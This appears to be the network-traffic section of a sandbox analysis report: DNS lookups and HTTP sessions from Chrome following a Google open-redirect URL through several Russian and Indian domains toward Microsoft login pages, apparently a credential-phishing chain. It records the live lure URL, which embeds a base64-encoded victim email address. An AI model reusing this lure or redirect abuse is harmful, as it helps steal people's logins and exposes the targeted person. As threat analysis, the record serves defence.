                                                                    Jan 15, 2025 22:50:46.138274908 CET5612953192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:51:00.203982115 CET53528101.1.1.1192.168.2.8
                                                                    Jan 15, 2025 22:51:14.474306107 CET5510153192.168.2.81.1.1.1
                                                                    Jan 15, 2025 22:51:14.474633932 CET6277453192.168.2.81.1.1.1
                                                                    TimestampSource IPDest IPChecksumCodeType
                                                                    Jan 15, 2025 22:50:06.881300926 CET192.168.2.81.1.1.1c227(Port unreachable)Destination Unreachable
                                                                    Jan 15, 2025 22:50:09.860867023 CET192.168.2.81.1.1.1c27d(Port unreachable)Destination Unreachable
                                                                    Jan 15, 2025 22:50:30.526187897 CET192.168.2.81.1.1.1c26f(Port unreachable)Destination Unreachable
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Jan 15, 2025 22:50:04.801645994 CET192.168.2.81.1.1.10xc40dStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:04.802057981 CET192.168.2.81.1.1.10x33e8Standard query (0)www.google.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:05.930875063 CET192.168.2.81.1.1.10x795dStandard query (0)google.com.vnA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:05.933417082 CET192.168.2.81.1.1.10x8ec1Standard query (0)google.com.vn65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:06.864387989 CET192.168.2.81.1.1.10xb198Standard query (0)www.google.com.vnA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:06.864867926 CET192.168.2.81.1.1.10x3312Standard query (0)www.google.com.vn65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:08.791863918 CET192.168.2.81.1.1.10x9752Standard query (0)technicdude.inA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:08.792005062 CET192.168.2.81.1.1.10xf15fStandard query (0)technicdude.in65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:09.764815092 CET192.168.2.81.1.1.10xe68Standard query (0)r.bitualicar.ruA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:09.765120029 CET192.168.2.81.1.1.10x6562Standard query (0)r.bitualicar.ru65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.272129059 CET192.168.2.81.1.1.10xb95fStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.272326946 CET192.168.2.81.1.1.10xb7ccStandard query (0)code.jquery.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.272696018 CET192.168.2.81.1.1.10x1a4cStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.272978067 CET192.168.2.81.1.1.10x5227Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.273360968 CET192.168.2.81.1.1.10xdec6Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.273507118 CET192.168.2.81.1.1.10x828dStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.008012056 CET192.168.2.81.1.1.10xeaa4Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.008169889 CET192.168.2.81.1.1.10x1c4cStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.048093081 CET192.168.2.81.1.1.10x1768Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.048264980 CET192.168.2.81.1.1.10x9891Standard query (0)code.jquery.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.648525953 CET192.168.2.81.1.1.10x5a27Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.648704052 CET192.168.2.81.1.1.10xa9abStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.658690929 CET192.168.2.81.1.1.10x673Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.658839941 CET192.168.2.81.1.1.10xdb6bStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:14.468406916 CET192.168.2.81.1.1.10x5555Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:14.468406916 CET192.168.2.81.1.1.10x88dStandard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:25.436950922 CET192.168.2.81.1.1.10xbd96Standard query (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ruA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:25.437087059 CET192.168.2.81.1.1.10xeb57Standard query (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:27.014081955 CET192.168.2.81.1.1.10xac5Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:27.014261007 CET192.168.2.81.1.1.10x404dStandard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:27.025734901 CET192.168.2.81.1.1.10xebe0Standard query (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ruA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:27.025881052 CET192.168.2.81.1.1.10xf1b6Standard query (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:28.214243889 CET192.168.2.81.1.1.10xf100Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:28.214446068 CET192.168.2.81.1.1.10x8c55Standard query (0)www.office.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:30.485727072 CET192.168.2.81.1.1.10x9927Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:30.486113071 CET192.168.2.81.1.1.10xcc18Standard query (0)www.office.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:31.602735043 CET192.168.2.81.1.1.10x437bStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:31.603131056 CET192.168.2.81.1.1.10x54a3Standard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:46.137494087 CET192.168.2.81.1.1.10x899Standard query (0)login.microsoftonline.comA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:46.138274908 CET192.168.2.81.1.1.10x27d5Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:51:14.474306107 CET192.168.2.81.1.1.10xaa3Standard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:51:14.474633932 CET192.168.2.81.1.1.10x7225Standard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Jan 15, 2025 22:50:04.808512926 CET1.1.1.1192.168.2.80xc40dNo error (0)www.google.com142.250.185.196A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:04.809226990 CET1.1.1.1192.168.2.80x33e8No error (0)www.google.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:05.939383030 CET1.1.1.1192.168.2.80x795dNo error (0)google.com.vn142.250.185.195A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:06.871381044 CET1.1.1.1192.168.2.80xb198No error (0)www.google.com.vn216.58.212.163A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:08.826075077 CET1.1.1.1192.168.2.80x9752No error (0)technicdude.in185.221.216.102A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:09.773518085 CET1.1.1.1192.168.2.80xe68No error (0)r.bitualicar.ru104.21.86.91A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:09.773518085 CET1.1.1.1192.168.2.80xe68No error (0)r.bitualicar.ru172.67.217.102A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:09.860776901 CET1.1.1.1192.168.2.80x6562No error (0)r.bitualicar.ru65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.279431105 CET1.1.1.1192.168.2.80x5227No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.279442072 CET1.1.1.1192.168.2.80x1a4cNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.279442072 CET1.1.1.1192.168.2.80x1a4cNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.279567003 CET1.1.1.1192.168.2.80xb95fNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.279567003 CET1.1.1.1192.168.2.80xb95fNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.279567003 CET1.1.1.1192.168.2.80xb95fNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.279567003 CET1.1.1.1192.168.2.80xb95fNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.280350924 CET1.1.1.1192.168.2.80xdec6No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:11.280350924 CET1.1.1.1192.168.2.80xdec6No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.015053034 CET1.1.1.1192.168.2.80xeaa4No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.015053034 CET1.1.1.1192.168.2.80xeaa4No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.015691996 CET1.1.1.1192.168.2.80x1c4cNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.055775881 CET1.1.1.1192.168.2.80x1768No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.055775881 CET1.1.1.1192.168.2.80x1768No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.055775881 CET1.1.1.1192.168.2.80x1768No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.055775881 CET1.1.1.1192.168.2.80x1768No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.655364037 CET1.1.1.1192.168.2.80x5a27No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.655364037 CET1.1.1.1192.168.2.80x5a27No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.655714989 CET1.1.1.1192.168.2.80xa9abNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.665497065 CET1.1.1.1192.168.2.80x673No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.665497065 CET1.1.1.1192.168.2.80x673No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:12.665605068 CET1.1.1.1192.168.2.80xdb6bNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:14.475235939 CET1.1.1.1192.168.2.80x88dNo error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:25.450193882 CET1.1.1.1192.168.2.80xeb57No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:25.451634884 CET1.1.1.1192.168.2.80xbd96No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:25.451634884 CET1.1.1.1192.168.2.80xbd96No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:25.451634884 CET1.1.1.1192.168.2.80xbd96No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:25.451634884 CET1.1.1.1192.168.2.80xbd96No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:25.451634884 CET1.1.1.1192.168.2.80xbd96No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:25.451634884 CET1.1.1.1192.168.2.80xbd96No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:25.451634884 CET1.1.1.1192.168.2.80xbd96No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:27.020797968 CET1.1.1.1192.168.2.80xac5No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:27.021255016 CET1.1.1.1192.168.2.80x404dNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:27.038466930 CET1.1.1.1192.168.2.80xf1b6No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru65IN (0x0001)false
                                                                    Jan 15, 2025 22:50:27.219800949 CET1.1.1.1192.168.2.80xebe0No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:27.219800949 CET1.1.1.1192.168.2.80xebe0No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:27.219800949 CET1.1.1.1192.168.2.80xebe0No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:27.219800949 CET1.1.1.1192.168.2.80xebe0No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:27.219800949 CET1.1.1.1192.168.2.80xebe0No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:27.219800949 CET1.1.1.1192.168.2.80xebe0No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:27.219800949 CET1.1.1.1192.168.2.80xebe0No error (0)fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:28.221489906 CET1.1.1.1192.168.2.80xf100No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:28.221489906 CET1.1.1.1192.168.2.80xf100No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:28.254652023 CET1.1.1.1192.168.2.80x8c55No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:28.254652023 CET1.1.1.1192.168.2.80x8c55No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:29.503633976 CET1.1.1.1192.168.2.80x8b50No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:29.503633976 CET1.1.1.1192.168.2.80x8b50No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:30.492391109 CET1.1.1.1192.168.2.80x9927No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:30.492391109 CET1.1.1.1192.168.2.80x9927No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:30.524693012 CET1.1.1.1192.168.2.80xcc18No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:30.524693012 CET1.1.1.1192.168.2.80xcc18No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:30.534893036 CET1.1.1.1192.168.2.80xbbe6No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:30.534893036 CET1.1.1.1192.168.2.80xbbe6No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:31.609837055 CET1.1.1.1192.168.2.80x54a3No error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:31.609857082 CET1.1.1.1192.168.2.80x437bNo error (0)aadcdn.msftauth.netwww.tm.aadcdn.msftauth.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:46.144195080 CET1.1.1.1192.168.2.80x899No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:50:46.145879984 CET1.1.1.1192.168.2.80x27d5No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:51:14.481899023 CET1.1.1.1192.168.2.80x7225No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                    Jan 15, 2025 22:51:14.481919050 CET1.1.1.1192.168.2.80xaa3No error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                    • google.com.vn
                                                                    • www.google.com.vn
                                                                    • technicdude.in
                                                                    • https:
                                                                      • r.bitualicar.ru
                                                                      • code.jquery.com
                                                                      • challenges.cloudflare.com
                                                                      • cdnjs.cloudflare.com
                                                                      • fvdbpnj11nv1vdq0ahjfhlkgghxr7pcmudoku1iymq5wifs5lvubyziakwcw.gageodeg.ru
                                                                    • a.nel.cloudflare.com
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.849715142.250.185.1954434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:06 UTC1196OUTGET /url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&ved=xjnktlqryYWwVTDrgvK&uact=&url=amp%2Ftechnicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ== HTTP/1.1
                                                                    Host: google.com.vn
                                                                    Connection: keep-alive
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-User: ?1
                                                                    Sec-Fetch-Dest: document
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:06 UTC1057INHTTP/1.1 301 Moved Permanently
                                                                    Location: https://www.google.com.vn/url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&ved=xjnktlqryYWwVTDrgvK&uact=&url=amp%2Ftechnicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ==
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-6fcuWbS3EuP-h7hz9a1uuA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other
                                                                    Permissions-Policy: unload=()
                                                                    Date: Wed, 15 Jan 2025 21:50:06 GMT
                                                                    Expires: Fri, 14 Feb 2025 21:50:06 GMT
                                                                    Cache-Control: public, max-age=2592000
                                                                    Server: gws
                                                                    Content-Length: 666
                                                                    X-XSS-Protection: 0
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                    Connection: close
                                                                    2025-01-15 21:50:06 UTC333INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 31 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2e 76 6e 2f 75 72 6c 3f 71 3d 49 45 51 42 5a 4f 38 32 55 30 31 38 45 54 59 4e 43 56 36 57 54 59 48 36 34 4b 30 42 44 39 46 67 51 69 41 70 4c 6a 4f 44 7a 33 79 68 34 6e 4e 65 57 38 75 75 51 69 26
                                                                    Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="https://www.google.com.vn/url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&
                                                                    2025-01-15 21:50:06 UTC333INData Raw: 63 36 62 38 65 63 33 37 66 39 39 64 33 35 35 39 31 36 30 65 62 32 63 30 31 66 63 62 62 38 41 30 78 79 73 38 45 6d 32 46 4c 26 61 6d 70 3b 73 6f 75 72 63 65 3d 26 61 6d 70 3b 63 64 3d 74 53 36 54 38 62 62 63 36 62 38 65 63 33 37 66 39 39 64 33 35 35 39 31 36 30 65 62 32 63 30 31 66 63 62 62 38 54 69 77 39 58 48 26 61 6d 70 3b 63 61 64 3d 4a 78 57 7a 44 66 42 50 62 62 63 36 62 38 65 63 33 37 66 39 39 64 33 35 35 39 31 36 30 65 62 32 63 30 31 66 63 62 62 38 56 53 30 59 26 61 6d 70 3b 76 65 64 3d 78 6a 6e 6b 74 6c 71 72 79 59 57 77 56 54 44 72 67 76 4b 26 61 6d 70 3b 75 61 63 74 3d 26 61 6d 70 3b 75 72 6c 3d 61 6d 70 25 32 46 74 65 63 68 6e 69 63 64 75 64 65 2e 69 6e 2f 6f 70 75 79 63 2f 62 62 63 36 62 38 65 63 33 37 66 39 39 64 33 35 35 39 31 36 30 65 62 32
                                                                    Data Ascii: c6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&amp;source=&amp;cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&amp;cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&amp;ved=xjnktlqryYWwVTDrgvK&amp;uact=&amp;url=amp%2Ftechnicdude.in/opuyc/bbc6b8ec37f99d3559160eb2


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.849718216.58.212.1634434836C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-01-15 21:50:07 UTC1200OUTGET /url?q=IEQBZO82U018ETYNCV6WTYH64K0BD9FgQiApLjODz3yh4nNeW8uuQi&rct=bbc6b8ec37f99d3559160eb2c01fcbb8wDnNeW8yycT&sa=t&esrc=nTgV8Fbbc6b8ec37f99d3559160eb2c01fcbb8A0xys8Em2FL&source=&cd=tS6T8bbc6b8ec37f99d3559160eb2c01fcbb8Tiw9XH&cad=JxWzDfBPbbc6b8ec37f99d3559160eb2c01fcbb8VS0Y&ved=xjnktlqryYWwVTDrgvK&uact=&url=amp%2Ftechnicdude.in/opuyc/bbc6b8ec37f99d3559160eb2c01fcbb8/ZnJlZC5uZXdjb21AY29sb25pYWxjaGVtLmNvbQ== HTTP/1.1
                                                                    Host: www.google.com.vn
                                                                    Connection: keep-alive
                                                                    Upgrade-Insecure-Requests: 1
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                    X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIlKHLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==
                                                                    Sec-Fetch-Site: none
                                                                    Sec-Fetch-Mode: navigate
                                                                    Sec-Fetch-User: ?1
                                                                    Sec-Fetch-Dest: document
                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                    sec-ch-ua-mobile: ?0
                                                                    sec-ch-ua-platform: "Windows"
                                                                    Accept-Encoding: gzip, deflate, br
                                                                    Accept-Language: en-US,en;q=0.9
                                                                    2025-01-15 21:50:07 UTC1096INHTTP/1.1 302 Found
